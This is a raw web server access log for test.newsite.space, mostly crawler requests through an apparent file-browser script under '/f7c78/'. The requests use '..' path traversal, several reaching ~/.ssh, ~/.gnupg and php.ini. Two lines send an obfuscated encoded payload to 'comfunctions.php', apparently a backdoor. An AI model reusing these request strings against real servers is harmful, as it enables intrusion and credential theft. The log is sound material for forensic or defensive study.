216.73.216.46 - - [21/Aug/2025:13:45:01 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2Fcpresources%2Fb6b51f3f%2F. HTTP/2.0" 200 1467 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 119 0.004 "7174" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:04 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fassets%2Flibs%2Fslick%2Fslick-theme.css HTTP/2.0" 200 1674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.007 "6356" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:07 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Faed7ab4c%2F..%2Fcf1f9745 HTTP/2.0" 200 1535 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.004 "9550" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:13:45:07 -0400] "GET /f7c78/comfunctions.php?ARRAY=7o2230223n313735353830313930362p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353739383330362q3230353263386665386164323735613166356638323165663335306333663933222p2232223n223737343938663465336439613661653564323662353837653662326331353438222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p2262696r675s70617373223n2232322q34352q35372q36332q37312q38312q3131227q HTTP/2.0" 200 303 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.3292.140 Safari/537.36 Edge/18.18761" "62.164.177.242" 654 0.922 "873" "0.922" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:10 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Faed7ab4c%2F..%2Fcf1f9745 HTTP/2.0" 200 1536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 128 0.004 "9694" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:13 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fcomposer%2F..%2Fparagonie HTTP/2.0" 200 1400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.005 "6688" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:16 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.ssh%2F..%2Frun%2F..%2F.gnupg HTTP/2.0" 200 1370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 82 0.004 "6118" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:19 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fmodules%2F.%2F..%2Fstorage%2Frebrand HTTP/2.0" 200 1412 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.004 "7751" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:22 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fmoneyphp%2F..%2Fpixelandtonic HTTP/2.0" 200 1398 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 108 0.004 "6716" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:25 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Ff80c1dcc%2F..%2F6df6f5d8 HTTP/2.0" 200 1512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "9262" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:28 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F5d88fcbb%2F..%2Fe3294a7e HTTP/2.0" 200 1517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.004 "8495" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:31 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fcomposer%2F..%2Ftecnickcom HTTP/2.0" 200 1394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.004 "6669" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:34 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Faed7ab4c%2F..%2Fcf1f9745 HTTP/2.0" 200 1513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "9179" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:37 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Faed7ab4c%2F..%2Ff2cd4ff0 HTTP/2.0" 200 1529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 128 0.004 "8767" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:40 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Faed7ab4c%2F..%2Fb1daeca9 HTTP/2.0" 200 1522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.006 "9468" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:43 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2F5d88fcbb%2F..%2Fb1daeca9 HTTP/2.0" 200 1510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.004 "9232" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:46 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F5d88fcbb%2F..%2Fe3294a7e HTTP/2.0" 200 1499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "8151" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:49 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Faed7ab4c%2F..%2F6b9f20ee HTTP/2.0" 200 1507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.004 "8582" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:52 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Ff80c1dcc%2F..%2Ff2cd4ff0 HTTP/2.0" 200 1505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "8285" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:55 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Fcec54a4c%2F..%2Ff7099225 HTTP/2.0" 200 1528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 127 0.004 "8672" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:45:58 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Faed7ab4c%2F..%2F6b9f20ee HTTP/2.0" 200 1510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 127 0.004 "8720" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:01 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fcomposer%2F..%2Fparagonie HTTP/2.0" 200 1407 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 108 0.005 "6794" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:04 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fmoneyphp%2F..%2Fmonolog HTTP/2.0" 200 1404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.004 "6959" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:07 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fmoneyphp%2F..%2Felvanto HTTP/2.0" 200 1410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.004 "6963" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:10 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Faed7ab4c%2F..%2F6b9f20ee HTTP/2.0" 200 1490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "8238" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:13 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Filluminate%2Fcontracts%2FBroadcasting HTTP/2.0" 200 1602 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 113 0.004 "12797" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:16 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Fcec54a4c%2F..%2Faac2e380 HTTP/2.0" 200 1631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 126 0.003 "12511" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:19 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Faed7ab4c%2F..%2F6df6f5d8 HTTP/2.0" 200 1536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 127 0.004 "9777" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:22 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Fcec54a4c%2F..%2F7683ad58 HTTP/2.0" 200 1561 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 128 0.005 "10827" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:25 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Fcec54a4c%2F..%2Ff8e62810 HTTP/2.0" 200 1545 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 127 0.004 "9833" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:28 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Fcec54a4c%2F..%2Ffc951955 HTTP/2.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 128 0.005 "96000" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:13:46:42 -0400] "GET /f7c78/comfunctions.php?of=1 HTTP/2.0" 200 2104 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.6 Mobile/15E148 Safari/604.1" "62.164.177.242" 308 0.006 "5462" "0.006" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:54 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fphpoption%2F..%2Fcraftcms HTTP/2.0" 200 1553 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 351 0.009 "11345" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:56 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fcebe%2F..%2Fcraftcms HTTP/2.0" 200 1533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 338 0.004 "10769" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:46:59 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fsabberworm%2F..%2Fcraftcms HTTP/2.0" 200 1539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 342 0.004 "10931" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:02 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fstorage%2Fruntime%2Fcache%2F21 HTTP/2.0" 200 1505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.003 "6978" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:05 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F70f7c%2F..%2F70f7c HTTP/2.0" 200 1448 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.004 "7755" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:08 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2F.%2Fdompdf HTTP/2.0" 200 1373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 100 0.003 "6497" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:11 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fsabberworm%2F..%2Fverbb HTTP/2.0" 200 1419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.004 "7665" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:14 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fcebe%2F..%2Fverbb HTTP/2.0" 200 1430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.003 "7908" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:17 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fether%2F..%2Fseld HTTP/2.0" 200 1488 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.004 "10036" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:20 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fsabberworm%2F..%2Fcraftcms HTTP/2.0" 200 1556 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 116 0.003 "11372" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:23 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fassets%2Fcss%2F.%2Fanimations.css HTTP/2.0" 200 4043 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 119 0.005 "32321" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:26 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fstorage%2Fruntime%2Fcompiled_templates%2F24 HTTP/2.0" 200 1474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 111 0.003 "6977" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:29 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F18a196f3%2F..%2Faed7ab4c HTTP/2.0" 200 1500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "8197" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:32 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Freact%2F..%2Fverbb HTTP/2.0" 200 1410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 101 0.003 "7575" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:35 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fdoctrine%2Fdeprecations%2F.. HTTP/2.0" 200 1436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 343 0.004 "8817" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:38 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F108d6eda%2F..%2Faed7ab4c HTTP/2.0" 200 1501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "8197" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:41 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Fc57df74c%2F..%2Ff80c1dcc HTTP/2.0" 200 1519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.003 "8517" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:44 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2F..%2Fassets%2Flibs HTTP/2.0" 200 1645 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 113 0.003 "17667" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:47 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F30a37%2F..%2Fphp.ini HTTP/2.0" 200 977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.003 "2991" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:50 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fassets%2F.%2Fcss%2F.%2Fanimations.css HTTP/2.0" 200 4051 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 122 0.004 "32428" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:53 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fcebe%2F..%2Fcraftcms HTTP/2.0" 200 1537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.003 "10899" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:56 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fstorage%2Fruntime%2Fcompiled_templates%2F16 HTTP/2.0" 200 1475 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.004 "6977" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:47:59 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fcebe%2F..%2Fverbb HTTP/2.0" 200 1413 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 101 0.003 "7557" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:02 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fstorage%2Fruntime%2Fcache%2F26 HTTP/2.0" 200 1591 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.004 "9736" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:05 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fstorage%2Fruntime%2Fcompiled_templates%2F95 HTTP/2.0" 200 1476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.004 "6977" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:08 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fstorage%2Fruntime%2Fcompiled_templates%2F54 HTTP/2.0" 200 1474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 111 0.003 "6976" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:16 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fmodules%2F..%2Fvendor%2Fiio HTTP/2.0" 200 1408 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 348 0.008 "6905" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fwebmozart%2F..%2Fguzzlehttp HTTP/2.0" 200 1436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 343 0.004 "8750" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fmodules%2F..%2Fvendor%2Fcriticalgears HTTP/2.0" 200 1423 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 119 0.004 "7079" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Fd842585c%2F..%2F92fd50c HTTP/2.0" 200 1502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "9077" "0.003" "test.newsite.space"
